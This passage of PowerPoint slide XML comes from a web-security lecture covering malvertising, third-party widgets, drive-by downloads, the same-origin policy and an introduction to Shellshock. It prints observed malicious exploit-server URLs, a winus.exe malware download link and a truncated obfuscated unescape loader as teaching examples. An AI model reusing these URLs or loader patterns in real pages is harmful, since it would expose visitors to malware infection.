              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>definition means ceding control of content to another party </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>masters have to trust </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>advertisers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>sub</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>-syndication allows delegation of advertising space </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>trust </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>is not transitive </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0">
              <a:effectLst/>
            </a:endParaRP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890" y="3317703"/>
            <a:ext cx="5475110" cy="354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492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Third-Party Widgets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make sites prettier or more useful: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calendaring </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>or stats counter </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>search </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>for praying mantis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linked </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>to free stats counter in 2002 via </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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/>
              <a:t>started to compromise users in 2006 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US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837837"/>
            <a:ext cx="8686800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http://expl.info/cgi-bin/ie0606.cgi?homepage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demo.php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cgi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>-bin/ie0606.cgi?type=MS03-11&amp;SP1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/ms0311.jar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expl.info</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>cgi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>-bin/ie0606.cgi?exploit=MS03-11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dist.info</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/f94mslrfum67dh/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>winus.exe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0783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Trends and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Avoiding </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>detection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obfuscating the exploit code itself </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>distributing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>binaries across different domains </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>continuously </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>re-packing the binaries </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean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354395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document.write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>unescape</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>("%3CHEAD%3E%0D%0A%3CSCRIPT%20 LANGUAGE%3D%22Javascript%22%3E%0D%0A%3C%21--%0D%0A /*%20criptografado%20pelo%20Fal%20-%20Deboa%E7%E3o %20gr%E1tis%20para%20seu%20site%20renda%20extra%0D</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> ... </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>3C/SCRIPT%3E%0D%0A%3C/HEAD%3E%0D%0A%3CBODY%3E%0D%0A %3C/BODY%3E%0D%0A%3C/HTML%3E%0D%0A")); </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>//--&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&lt;/SCRIPT&gt;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5289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Exploiting Software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 smtClean="0"/>
              <a:t>To install malware </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>automatically</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> when a user visits a web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>page, an adversary can choose to exploit flaws in either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 smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>browser</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> or automatically launched </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>external programs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW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TW" dirty="0" smtClean="0"/>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>extensions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i.e.,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>drive-by-download</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Example</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>(of</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Microsoft’s Data Access Components)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>The exploit is delivered to a user’s browser via an</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> on a compromised web page.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/>
              <a:t>iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> contains </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> to instantiate an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ActiveX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 that is not normally safe for scripting.</a:t>
            </a:r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 err="1" smtClean="0"/>
              <a:t>Javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> makes an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XMLHTTP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>request to retrieve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 executable.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>Adodb.stream</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> is used to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>write </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>the executable </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>to disk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 err="1" smtClean="0"/>
              <a:t>Shell.Application</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> is used to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>launch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> the newly written</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>executable.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="426006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Tricking the User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Example</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>A common example are sites that display thumbnails to adult videos.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Clicking on a thumbnail causes a page resembling the Windows Media Player plug-in to load. The page asks the user to download and run a special “codec”.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>This “codec” is really a malware binary. By pretending that its execution grants access to pornographic material, the adversary tricks the user into accomplishing what would otherwise require an exploitable vulnerability.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53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Malware Classifications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1" y="1140252"/>
            <a:ext cx="7402688" cy="57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6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Web?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platform for deploying applications, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>portably </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>securely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128963"/>
            <a:ext cx="7797800" cy="299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Remotely Linked Exploits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xploits </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>are leveraged across many sites </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Popular </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>exploits are linked from over 10,000 URLS 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80" y="2654572"/>
            <a:ext cx="6772676" cy="42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8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increase </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>of web-based exploitation over time </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>installed malware allows for remote control </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>observed botnet like structures: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pull</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-based: frequently checking for new commands </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>observed </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>user agents such as: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>DDoSBotLoader</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>binary </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>updates can be interpreted as command &amp; control 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5354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dirty="0"/>
              <a:t>-based malware is a real problem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millions </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>of potentially infected users </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Automatic detection of malicious web pages to secure web search results </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Identified four areas of content control </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Observed </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>botnet-like structures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66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Risk #2: we don’t want a malicious site to be able to spy on or tamper with my information or interactions with other websites </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Browsing to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>evil.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> should not let </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>evil.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> spy on my emails in Gmail or buy stuff with my Amazon account </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Defense: the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>same-origin policy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>A security policy grafted on after-the-fact, and enforced by web browsers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Intuition: each web site is isolated from all others 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2092566"/>
            <a:ext cx="7020653" cy="47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02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0" y="2273415"/>
            <a:ext cx="6214957" cy="44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4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 smtClean="0"/>
              <a:t>Granularity of protection: the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>origin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Origin = protocol + hostname (+ port)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Javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> on one page can read, change, and interact freely with all other pages from the same origin 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07" y="2702193"/>
            <a:ext cx="7475699" cy="18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52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Same-origin policy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Browsers provide isolation for JS scripts via the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Same Origin Policy </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>SOP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Simple version: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Browser associates web page elements (layout, cookies, events) with a given </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>origin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>≈ web server that provided the page/cookies in the first place</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Identity of web server is in terms of its hostname, e.g., </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>bank.com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SOP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="3366FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="3366FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>only scripts received from a web page’s origin have access to page’s elements </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>XSS: Subverting the Same Origin Policy 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5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on the web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#3: we want data stored on a web server to be protected from unauthorized access </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Defense: server-side security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828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Shellshock</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>a.k.a. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Bashdoor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> / Bash </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>bug</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(Disclosed on Sep 24, 2014)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6477000"/>
            <a:ext cx="9144000" cy="7620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</a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Acknowledgement: slides from Prof. Bruce </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>Maggs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 advTm="11696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Web security:  two tales</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1638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Web browser:    (client side)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Attacks target browser security weaknesses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Result in:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Malware installation  (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>keyloggers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>,  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>botnets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Document theft from corporate network</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Loss of private data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Web application code:     (server side)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Runs at web site:   banks, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>-merchants,  blogs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Written in  PHP, ASP, JSP, Ruby, …</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Many challenges:  XSS,  CSRF,  SQL injection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Bash Shell</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="307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Released June 7, 1989.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Unix shell providing built-in commands such as cd, pwd, echo, exec, builtin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Platform for executing programs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Can be scripted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Environment Variables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Environment variables can be set in the Bash shell, and are passed on to programs executed from Bash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r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Apple Symbols"/>
                <a:cs typeface="Apple Symbols"/>
              </a:rPr>
              <a:t>export VARNAME=“value”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r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>printenv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> to list environment variables)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pP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Stored Bash Shell Script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648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800"/>
              <a:t>An executable text file that begins with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#!program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Tells bash to pass the rest of the file to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>program</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800"/>
              <a:t> to be executed.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800"/>
              <a:t>Example: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#!/bin/bash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STR="Hello World!"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800"/>
              <a:t>echo $STR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Hello World!  Example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6400"/>
            <a:ext cx="822960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Dynamic Web Content Generation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Web Server receives an HTTP request from a user.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Server runs a program to generate a response to the request.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Program output is sent to the browser.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Common Gateway Interface (CGI)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00" y="1752600"/>
            <a:ext cx="8077200" cy="5262563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Helvetica" pitchFamily="-111" charset="0"/>
              </a:rPr>
              <a:t>Oldest method of generating dynamic Web content (circa 1993, NCSA)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800">
              <a:latin typeface="Helvetica" pitchFamily="-111" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:latin typeface="Helvetica" pitchFamily="-111" charset="0"/>
              </a:rPr>
              <a:t>Operator of a Web server designates a directory to hold scripts (typically PERL) that can be run on HTTP GET, PUT, or POST requests to generate output to be sent to browser.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800">
              <a:latin typeface="Helvetica" pitchFamily="-111" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800">
              <a:latin typeface="Helvetica" pitchFamily="-111" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800">
